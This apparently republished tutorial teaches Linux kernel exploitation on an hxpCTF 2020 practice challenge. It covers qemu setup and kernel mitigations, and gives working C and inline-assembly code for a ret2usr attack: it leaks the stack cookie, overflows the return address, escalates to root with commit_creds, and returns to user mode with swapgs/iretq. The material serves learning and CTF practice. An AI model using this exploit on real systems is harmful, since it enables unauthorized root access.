In this series, I’m going to write about some basics in Linux kernel exploitation that I’ve learned over the past few weeks: from basic environment configuration to some popular Linux kernel mitigations, and their corresponding exploitation techniques.
Requirements:
- Linux – A Linux machine
- Programming – High programming skills
Responsibility:
In this tutorial we will use hacking techniques, with the only purpose of learning. We do not promote its use for profit or improper purposes. We are not responsible for any damage or impairment that may be generated in the systems used. The responsibility lies entirely with the user of this tutorial.
Knowledge:
- Linux – Not applicable
- Programming – High
- Kali Linux – Not applicable
- Windows – Not applicable
- Networks – Low
Overall Tutorial Level: Medium
Ideal for: Systems Engineers, Security Engineers, Pentesters
For the learning process, I used the environment provided by an hxpCTF 2020 challenge called kernel-rop to practice. Note that I only used it as a practice environment; this is not an actual writeup of the challenge itself (although the environment configuration in the last post may be the same as the one in the challenge, so you can call it a writeup). I chose this particular challenge because:
- The configuration is fairly standard and easy to modify to my practical needs.
- The bug in the kernel module is extremely trivial and basic.
- The kernel version is fairly new (at the time I wrote this post, of course).
For me, this series serves as a reminder, an exploit template for me to look back on and reuse in the future, but if I could help anyone in their first steps in Linux kernel exploitation for just a little bit, I would be very happy.
So let’s start the first post of the series, where I demonstrate the most basic way to set up a Linux kernel pwn environment, and the most basic exploit technique.
Environment configuration
For a Linux kernel pwn challenge, our task is to exploit a vulnerable custom kernel module that is installed in the kernel at boot time. In most cases, the module is given along with some files that ultimately use qemu as the emulator for a Linux system. In some rare cases we may be given a VMWare or VirtualBox VM image, or no emulation environment at all, but judging by the challenges I have sampled those are uncommon, so I will only explain the common case, which is emulated by qemu.
In particular, for the kernel-rop challenge, we are given a lot of files, but only these files are important for the qemu configuration:
- vmlinuz – the compressed Linux kernel, sometimes called bzImage. We can extract it into the actual kernel ELF file, called vmlinux.
- initramfs.cpio.gz – the Linux file system, packed with cpio and compressed with gzip. Directories like /bin, /etc, … are stored in this file, and the vulnerable kernel module is likely to be included in the file system as well. For other challenges, this file could use some other compression scheme.
- run.sh – the shell script containing the qemu run command. We can change the qemu and Linux boot configuration here.
Let’s take a closer look at each of these files to find out what to do with them, one by one.
The kernel
The Linux kernel, often given under the name vmlinuz or bzImage, is the compressed version of the kernel image called vmlinux. There may be a few different compression schemes used such as gzip, bzip2, lzma, etc. Here I used a script called extract-image.sh to extract the ELF file from the kernel:
$ ./extract-image.sh ./vmlinuz > vmlinux
The reason for extracting the kernel image is to find the ROP gadgets inside it. If you are already familiar with pwning in userland, you know what ROP is, and in the kernel, it is not much different (we will see it in later posts). Personally I prefer to use ROPgadget to do the job:
$ ROPgadget --binary ./vmlinux > gadgets.txt
Note that unlike a simple userland program, the kernel image is HUGE. ROPgadget will therefore take a long time to find all the gadgets, so it is wise to start the search at the very beginning of the pwning process. It is also wise to save the output to a file, since you do not want to rerun ROPgadget every time you need a different gadget.
The file system
Again, this is a compressed file. I use this decompress.sh script to decompress it:
mkdir initramfs
cd initramfs
cp ../initramfs.cpio.gz .
gunzip ./initramfs.cpio.gz
cpio -idm < ./initramfs.cpio
rm initramfs.cpio
After running the script, we have an initramfs directory that looks like the root directory of a file system on a Linux machine. In this case, the vulnerable kernel module hackme.ko is also included in the root directory; we will copy it somewhere else to analyze it later.
The reason we decompress this file is not only to get the vulnerable module, but also to modify parts of the file system to suit our needs. First of all, we can look in the /etc directory, because most of the startup scripts that run after boot are stored here. In particular, we look for the following line in one of the files (usually rcS or inittab) and then modify it:
setuidgid 1000 /bin/sh
# Modify it into the following
setuidgid 0 /bin/sh
The purpose of this line is to generate a non-root shell with UID 1000 after booting. After modifying the UID to 0, we will have a root shell at boot time. You may ask: why should we do this? In fact, this seems quite contradictory, because our goal is to exploit the kernel module to get root, not to modify the file system (of course, we cannot modify the file system on the remote challenge server). The ultimate reason here is just to simplify the exploitation process. There are some files that contain useful information for us when we develop the exploit code, but require root access to read them, for example:
- /proc/kallsyms lists all addresses of all symbols loaded in the kernel.
- /sys/module/core/sections/.text shows the address of the .text section of the kernel, which is also its base address (although in the case of this challenge, there is no such /sys directory, you can retrieve the base address from /proc/kallsyms).
Secondly, we unzip the file system to put our exploit program on it later. After modifying it, I use this compress.sh script to compress it back into the given format:
gcc -o exploit -static $1
mv ./exploit ./initramfs
cd initramfs
find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > initramfs.cpio.gz
mv ./initramfs.cpio.gz ../
The first 2 lines are for compiling the exploit code and putting it into the file system.
Execution of the qemu script
Initially, the given run.sh looks like this:
qemu-system-x86_64 \
    -m 128M \
    -cpu kvm64,+smep,+smap \
    -kernel vmlinuz \
    -initrd initramfs.cpio.gz \
    -hdb flag.txt \
    -snapshot \
    -nographic \
    -monitor /dev/null \
    -no-reboot \
    -append "console=ttyS0 kaslr kpti=1 quiet panic=1"
Some notable flags are:
- -m specifies the memory size. If for some reason you cannot start the emulator, you can try increasing it.
- -cpu specifies the CPU model. Here we can add +smep and +smap to enable the SMEP and SMAP mitigation features (more on this later).
- -kernel specifies the compressed kernel image.
- -initrd specifies the compressed file system.
- -append specifies additional boot options. This is also where we can enable/disable mitigation features.
The first thing to do here is to add the -s option. This option (shorthand for -gdb tcp::1234) allows us to debug the emulated kernel remotely from our host machine. All we have to do is start the emulator normally, and then on the host machine, run:
$ gdb vmlinux
(gdb) target remote localhost:1234
Then, we can debug the system kernel normally, just like when we attach gdb to a normal userland process.
The second thing we can do is modify the mitigation features to our practice needs. Of course, when we face a real challenge in a CTF, we may not want to do this, but again, this is me practicing different exploitation techniques in different scenarios, so modifying them is perfectly fine.
Linux Kernel Mitigation Features
Like mitigation features such as ASLR, stack canaries, PIE, etc. used by userland programs, the kernel also has its own set of mitigation features. Below are some of the popular and notable Linux kernel mitigation features that I consider when learning kernel pwn:
- Kernel stack cookies (or canaries) – exactly the same as userland stack canaries. This is enabled in the kernel at compile time and cannot be disabled.
- Kernel Address Space Layout Randomization (KASLR) – like ASLR in userland, it randomizes the base address where the kernel is loaded each time the system boots. It can be enabled/disabled by adding kaslr or nokaslr in the -append option.
- Supervisor Mode Execution Protection (SMEP) – this feature makes all userland pages non-executable while the CPU is running in kernel mode. In the kernel, this is enabled by setting bit 20 of Control Register CR4. At startup, it can be enabled by adding +smep to -cpu, and disabled by adding nosmep to -append.
- Supervisor Mode Access Prevention (SMAP) – complementing SMEP, this feature makes all userland pages inaccessible while the CPU is running in kernel mode, meaning that they cannot be read or written either. In the kernel, this is enabled by setting bit 21 of Control Register CR4. At startup, it can be enabled by adding +smap to -cpu, and disabled by adding nosmap to -append.
- Kernel page table isolation (KPTI) – when this feature is enabled, the kernel separates the user space and kernel space page tables completely, instead of using a single set of page tables containing both user space and kernel space addresses. One set of page tables includes both kernel space and user space addresses, as before, but is only used when the system is running in kernel mode. The second set of page tables for use in user mode contains a copy of the user space and a minimal set of kernel space addresses. It can be enabled/disabled by adding kpti=1 or nopti to the -append option.
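To make the two CR4 bits mentioned in the list concrete, here is a minimal sketch that checks and clears them on a plain integer. The helper names and the sample CR4 value in the usage note are my own illustrative choices, not something taken from the challenge or the kernel source.

```c
#include <stdbool.h>
#include <stdint.h>

/* Bit positions in CR4, as described in the list above. */
#define CR4_SMEP_BIT 20
#define CR4_SMAP_BIT 21

/* Hypothetical helper: true if the SMEP bit is set in a CR4 value. */
bool cr4_has_smep(uint64_t cr4) {
    return (cr4 >> CR4_SMEP_BIT) & 1;
}

/* Hypothetical helper: true if the SMAP bit is set in a CR4 value. */
bool cr4_has_smap(uint64_t cr4) {
    return (cr4 >> CR4_SMAP_BIT) & 1;
}

/* Hypothetical helper: the same CR4 value with SMEP and SMAP cleared. */
uint64_t cr4_clear_smep_smap(uint64_t cr4) {
    uint64_t mask = (1ULL << CR4_SMEP_BIT) | (1ULL << CR4_SMAP_BIT);
    return cr4 & ~mask;
}
```

For example, with an assumed value of 0x3006f0 both helpers report the bit as set, and cr4_clear_smep_smap() gives back 0x6f0. This is handy when reading a CR4 value out of gdb while checking which mitigations are actually active.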
The way I learned was to start with the fewest mitigation features enabled, just the stack cookies, and then add the others one by one to learn the different techniques that apply in each case. But first, let’s analyze the vulnerable hackme.ko module itself.
Kernel module analysis
The module is absolutely simple. First, in hackme_init(), it registers a device called hackme with the following operations: hackme_read, hackme_write, hackme_open and hackme_release. This means that we can communicate with this module by opening /dev/hackme and performing reads or writes to it.
Performing a read or write on the device calls hackme_read() or hackme_write() in the kernel. Their code is as follows (decompiled with IDA Pro, with some irrelevant parts omitted):
ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off)
{
    //...
    int tmp[32];
    //...
    if ( _size > 0x1000 )
    {
        _warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, _size);
        BUG();
    }
    _check_object_size(hackme_buf, _size, 0LL);
    if ( copy_from_user(hackme_buf, data, v5) )
        return -14LL;
    _memcpy(tmp, hackme_buf);
    //...
}

ssize_t __fastcall hackme_read(file *f, char *data, size_t size, loff_t *off)
{
    //...
    int tmp[32];
    //...
    _memcpy(hackme_buf, tmp);
    if ( _size > 0x1000 )
    {
        _warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, _size);
        BUG();
    }
    _check_object_size(hackme_buf, _size, 1LL);
    v6 = copy_to_user(data, hackme_buf, _size) == 0;
    //...
}
The bug in these two functions is quite clear: both read from or write to a stack buffer that is only 0x80 bytes long, yet they only complain about a buffer overflow if the size is greater than 0x1000. Using this bug, we can freely read and write past the buffer on the kernel stack.
Now, let’s see what we can do with the above primitives to get root privileges, starting with the fewest mitigation features possible: only stack cookies.
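The arithmetic behind the bug can be sketched in a few lines of userland C. This is only an illustration of the sizes involved, assuming tmp really is int[32] as the decompilation shows and that int is 4 bytes; the macro and function names are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>

/* Size of the stack buffer tmp[32], assuming 4-byte int: 0x80 bytes. */
#define TMP_BYTES        (32 * sizeof(int))
/* Largest size the module's check still lets through. */
#define MAX_CHECKED_SIZE ((size_t)0x1000)

/* Hypothetical helper: does a request of `size` bytes pass the module's check? */
bool size_passes_check(size_t size) {
    return size <= MAX_CHECKED_SIZE;
}

/* Hypothetical helper: how many bytes beyond tmp a request of `size` touches. */
size_t bytes_past_tmp(size_t size) {
    return size > TMP_BYTES ? size - TMP_BYTES : 0;
}
```

Under these assumptions, a request of 0x1000 bytes passes the check while reaching 0xf80 bytes beyond the end of tmp, which is far more than needed to hit the cookie and the return address.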
The simplest exploit – ret2usr
Recall that when we first learned userland pwn, most of us may have done a simple stack buffer overflow challenge where ASLR is disabled and the NX bit is not set. In this case, what we did was use a technique called ret2shellcode, where we put our shellcode somewhere on the stack, then debugged to find its address and overwrote the return address of the current function with what we found.
Return-to-user, also known as ret2usr, originates from a quite similar idea. Here, instead of putting shellcode on the stack, we exploit the fact that we have full control of what is present in userland: we put the piece of code we want the program flow to jump to in userland itself, then simply overwrite the return address of the function being called in the kernel with that address. Since the vulnerable function is a kernel function, our code is executed in kernel mode even though it lives in userland. Thus, we have achieved arbitrary code execution.
To make this technique work, we remove most of the mitigation features in the qemu run script: drop +smep, +smap, kpti=1 and kaslr, and add nopti and nokaslr.
As this is the first technique in the series, I will explain the exploitation process step by step.
Open the device
First of all, before we can interact with the module, we have to open it. The function to open the device is as simple as opening a normal file:
int global_fd;

void open_dev(){
    global_fd = open("/dev/hackme", O_RDWR);
    if (global_fd < 0){
        puts("[!] Failed to open device");
        exit(-1);
    } else {
        puts("[*] Opened device");
    }
}
After doing this, we can now read and write to global_fd.
Leaking stack cookies
Since we can read past the end of the buffer on the kernel stack, leaking is trivial. The stack buffer tmp is 0x80 bytes long, and the stack cookie is immediately after it. Therefore, if we read the data into an unsigned long array (each element of which is 8 bytes long), the cookie will be at index 16:
unsigned long cookie;

void leak(void){
    unsigned n = 20;
    unsigned long leak[n];
    ssize_t r = read(global_fd, leak, sizeof(leak));
    cookie = leak[16];

    printf("[*] Leaked %zd bytes\n", r);
    printf("[*] Cookie: %lx\n", cookie);
}
Overwriting the return address
The situation here is the same as for leaking: we create an unsigned long array, and then overwrite the cookie with our leaked cookie at index 16. The important thing to note here is that, unlike typical userland programs, this kernel function actually pops 3 registers from the stack, namely rbx, r12 and rbp, instead of just rbp (this can be clearly seen in the disassembly of the functions). Therefore, we have to put 3 dummy values after the cookie. The next value is then the return address we want execution to return to, which is the function we will craft in userland to get root privileges. I have called it escalate_privs:
void overflow(void){
    unsigned n = 50;
    unsigned long payload[n];
    unsigned off = 16;
    payload[off++] = cookie;
    payload[off++] = 0x0; // rbx
    payload[off++] = 0x0; // r12
    payload[off++] = 0x0; // rbp
    payload[off++] = (unsigned long)escalate_privs; // ret

    puts("[*] Prepared payload");
    ssize_t w = write(global_fd, payload, sizeof(payload));

    puts("[!] Should never be reached");
}
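The layout that overflow() relies on can also be written down as named indices, which makes it easier to adapt when a different function pops a different number of registers. The following is a minimal sketch under the assumptions stated in the text (0x80-byte buffer, cookie right after it, 3 saved registers); build_payload and the macro names are hypothetical, and uint64_t stands in for the 8-byte unsigned long.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TMP_BYTES    0x80                                /* size of tmp[32] */
#define COOKIE_INDEX (TMP_BYTES / sizeof(uint64_t))      /* 16 */
#define SAVED_REGS   3                                   /* rbx, r12, rbp */
#define RET_INDEX    (COOKIE_INDEX + 1 + SAVED_REGS)     /* 20 */

/*
 * Hypothetical helper: zero-fills `payload` (n elements), then places the
 * leaked cookie and the new return address at their slots.
 * Returns the number of elements that matter, or 0 if the buffer is too small.
 */
size_t build_payload(uint64_t *payload, size_t n,
                     uint64_t cookie, uint64_t ret_addr) {
    if (n <= RET_INDEX)
        return 0;
    memset(payload, 0, n * sizeof(*payload));  /* dummy rbx, r12, rbp = 0 */
    payload[COOKIE_INDEX] = cookie;
    payload[RET_INDEX] = ret_addr;
    return RET_INDEX + 1;
}
```

With this helper, the body of overflow() would reduce to one build_payload() call followed by the write() to the device; the first 21 elements are the ones that matter.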
The final concern here is what we actually write to that function to get root privileges.
Obtaining root privileges
Again, just as a reminder, our goal in kernel exploitation is not to open a shell via system("/bin/sh") or execve("/bin/sh", NULL, NULL), but rather to get root privileges on the system, and then open a root shell. Typically, the most common way to do this is to use the 2 functions called commit_creds() and prepare_kernel_cred(), which already reside in the kernel code itself. What we need to do is to call the 2 functions like this:
commit_creds(prepare_kernel_cred(0))
Since KASLR is disabled, the addresses where these functions reside are constant at each boot. Therefore, we can easily obtain those addresses by reading the /proc/kallsyms file using these shell commands:
cat /proc/kallsyms | grep commit_creds
-> ffffffff814c6410 T commit_creds
cat /proc/kallsyms | grep prepare_kernel_cred
-> ffffffff814c67f0 T prepare_kernel_cred
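If you would rather resolve the addresses from C than from the shell, the same lookup can be sketched as below. It assumes each line has the "address type name" shape shown in the output above; the function names are my own, and unlike grep it matches the symbol name exactly rather than as a substring.

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: parses one kallsyms-style line ("addr type name").
 * Returns 1 and stores the address if the symbol name equals `wanted`.
 */
int parse_kallsyms_line(const char *line, const char *wanted,
                        unsigned long long *addr) {
    unsigned long long a;
    char type;
    char name[256];

    if (sscanf(line, "%llx %c %255s", &a, &type, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;
    *addr = a;
    return 1;
}

/* Hypothetical helper: scans a kallsyms-formatted file; returns 0 if not found. */
unsigned long long lookup_symbol(const char *path, const char *wanted) {
    FILE *f = fopen(path, "r");
    char line[512];
    unsigned long long addr = 0;

    if (!f)
        return 0;
    while (fgets(line, sizeof(line), f)) {
        if (parse_kallsyms_line(line, wanted, &addr))
            break;
    }
    fclose(f);
    return addr;
}
```

Calling lookup_symbol("/proc/kallsyms", "commit_creds") from the root shell we set up earlier should give the same address as the grep command. Without root, the file may show zeroed addresses, so a result of 0 is best treated as "not available".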
Then the code to achieve root privileges can be written as follows. It can be written in many different ways, since it simply calls the 2 functions consecutively, using the return value of one as the parameter of the other; I just saw this version in a writeup and copied it:
void escalate_privs(void){
    __asm__(
        ".intel_syntax noprefix;"
        "movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
        "xor rdi, rdi;"
        "call rax; mov rdi, rax;"
        "movabs rax, 0xffffffff814c6410;" //commit_creds
        "call rax;"
        ...
        ".att_syntax;"
    );
}
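As one of the "many different ways" of writing this, the same call chain can be expressed with C function pointers instead of inline assembly. The sketch below is a userland dry run only: the typedefs use void * in place of the kernel's real struct types, and the fake_* functions are stand-ins I made up so the chain can be exercised without a kernel.

```c
#include <stddef.h>

/* Simplified signatures; the kernel versions take and return struct pointers. */
typedef void *(*prepare_kernel_cred_fn)(void *daemon);
typedef int (*commit_creds_fn)(void *new_cred);

/* Calls commit(prepare(NULL)), i.e. commit_creds(prepare_kernel_cred(0)). */
int escalate_with(prepare_kernel_cred_fn prepare, commit_creds_fn commit) {
    void *cred = prepare(NULL);  /* 0 asks for a root credential, as in the text */
    return commit(cred);
}

/* ---- Userland stand-ins (hypothetical, for a dry run only) ---- */
int fake_root_cred;     /* pretend credential object */
void *last_committed;   /* records what was passed to commit */

void *fake_prepare_kernel_cred(void *daemon) {
    return daemon == NULL ? (void *)&fake_root_cred : NULL;
}

int fake_commit_creds(void *new_cred) {
    last_committed = new_cred;
    return 0;
}
```

In an actual ret2usr payload, the two arguments would instead be the kallsyms addresses cast to these pointer types, for example (prepare_kernel_cred_fn)0xffffffff814c67f0, and the call would have to run in kernel mode.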
Returning to userland
In the current state of the exploit, if you simply return to a piece of userland code to open a shell, you will be disappointed. The reason is that after running the above code, we are still executing in kernel mode. To open a root shell, we have to return to user mode.
Basically, when the kernel runs normally, it returns to user mode using 1 of these instructions (on x86_64): sysretq or iretq. The way most people do it is through iretq because, as far as I know, sysretq is more complicated to get right. The iretq instruction only requires that the stack be set up with 5 userland register values in this order: RIP|CS|RFLAGS|SP|SS.
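The order RIP|CS|RFLAGS|SP|SS can be pictured as a struct sitting at the top of the stack, lowest address first. This is only a sketch for visualizing the frame; the struct and function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* The 5 values iretq consumes, in increasing address order from rsp. */
struct iret_frame {
    uint64_t rip;     /* where user-mode execution resumes */
    uint64_t cs;      /* user code segment selector */
    uint64_t rflags;  /* user flags */
    uint64_t sp;      /* user stack pointer */
    uint64_t ss;      /* user stack segment selector */
};

/* Hypothetical helper: assembles a frame from saved user-mode values. */
struct iret_frame make_iret_frame(uint64_t rip, uint64_t cs, uint64_t rflags,
                                  uint64_t sp, uint64_t ss) {
    struct iret_frame f = {
        .rip = rip, .cs = cs, .rflags = rflags, .sp = sp, .ss = ss
    };
    return f;
}
```

Because the stack grows downward, building this frame with push instructions means pushing in reverse order: SS first and RIP last.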
The process maintains two different sets of values for these registers, one for user mode and one for kernel mode. Therefore, after finishing execution in kernel mode, it must revert to the user mode values for these registers. For RIP, we can simply use the address of the function that opens a shell. However, for the other registers, if we simply set them to random values, the process may not continue execution as expected. To solve this problem, people have thought of a very clever way: save the state of these registers before entering kernel mode, and then reload them after gaining root privileges. The function to save their states is as follows:
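// Globals that hold the saved user-mode register values
unsigned long user_cs, user_ss, user_rflags, user_sp;

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}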
One more thing: on x86_64, an instruction called swapgs must be executed before iretq. Its purpose is to swap the GS register between kernel mode and user mode. With all that information, we can finish the code to get root privileges, and then return to user mode:
unsigned long user_rip = (unsigned long)get_shell;

void escalate_privs(void){
    __asm__(
        ".intel_syntax noprefix;"
        "movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
        "xor rdi, rdi;"
        "call rax; mov rdi, rax;"
        "movabs rax, 0xffffffff814c6410;" //commit_creds
        "call rax;"
        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_sp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}
Finally, we can call the pieces that we have crafted one by one, in the correct order, to open a root shell:
int main() {
    save_state();
    open_dev();
    leak();
    overflow();

    puts("[!] Should never be reached");
    return 0;
}
Conclusion
This concludes my first post on my learning process of Linux kernel exploitation. In this post, I have demonstrated how to set up the environment for a Linux kernel pwn challenge, and also the simplest technique in kernel exploitation: ret2usr.
In the next post, I will gradually increase the difficulty by adding more and more mitigations, and show the corresponding technique to circumvent them.
Annex:
The script to extract kernel image is extract-image.sh.
The script to decompress the file system is decompress.sh.
The script to compile exploit and compress file system is compress.sh.
The full ret2usr exploitation code is ret2usr.c.
Credits: Midas Blog (lkmidas.github.io)